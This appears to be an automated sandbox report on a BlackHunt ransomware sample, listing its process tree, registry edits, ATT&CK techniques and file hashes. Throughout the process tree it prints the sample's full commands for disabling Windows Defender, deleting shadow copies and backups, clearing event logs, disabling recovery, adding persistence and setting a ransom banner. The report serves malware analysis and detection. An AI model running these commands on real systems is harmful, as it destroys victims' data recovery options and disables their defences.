wrote to memory of 2580 2844 cmd.exe 130 PID 2844 wrote to memory of 2580 2844 cmd.exe 130 PID 1944 wrote to memory of 2316 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 129 PID 1944 wrote to memory of 2316 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 129 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe"C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1252
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe" /F2⤵PID:2020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1632
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3564
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2668
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:3468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3208
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:3784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1524
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3896
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:284
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1692
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2868
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe"2⤵PID:1540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2884
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1504
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3888
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:300
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application2⤵
- Clears Windows event logs
PID:3776
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2800
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe" /F1⤵
- Creates scheduled task(s)
PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2436
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2660
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:1444
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1916
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2232
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Modifies registry class
PID:2572
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2392
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:1504
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:2⤵
- Deletes NTFS Change Journal
PID:3060
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2204
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1452
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2428
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2832
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2936
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2200
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2568
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:2032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-647858343687407225-588836127-190367608421257423997895498889002613631537624405"1⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2552
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "142266003612183888221300333210115304172081389295-1994888231540961135238750936"1⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2716
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:3532
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
PID:2772
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:3352
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3524
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:3376
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:1884
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:2744
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2144
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:2256
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "701028813-239872951-399994473-1283406478919537863-1581625207-712996650521954221"1⤵PID:1916
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:4008
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD561888a32b9fde9bece9e3e77d688e1b1
SHA13ef90d06450133a8482eeb99e97df920a4702cd9
SHA256e65df3d4d158eb853cbc041da89eee73334e560d515519a8b3727d6b9db08878
SHA512cf2acab0bff8e330beed4b6d6b1ea623f9336cd20b2accc318b78e5e6249c469fa259c0004f25629e6a6426f55b96a6c98b7b01b423f3485961e4dd85fc4dee2
-
Filesize
12KB
MD51b1d9485c40403c88a5aeebff4535feb
SHA1e2cf156520625cda43e475d169d75fc9816aaa9f
SHA256424fd4594ad7f5ff383c2c52aa657fecf81700d4ab8838d12b8c254f5d7b4056
SHA512767ef24ce07c30222cb7aed67faa21907e879197e1e48564797a9da3202096622ee1707422dc980f0fe0eb1a061a3d9d74566a421f295f0c0abc8433918ba48a
-
Filesize
684B
MD50c5712e893f6d72153f056328bde8517
SHA1cc7a1ccf1f2f841021972d9164ee83cee62685b8
SHA256ab04e656788a8d86bdd5c90480c1dcd732e1478bc89c861895d46238cb092263
SHA512f5273fb133e4bc9efb388238df557981441daba74b076d38d8a2671f452702de057f45a16fcf5384590bcf5eed8586c4ec95fe6d24aa0b372807ddbaae34feae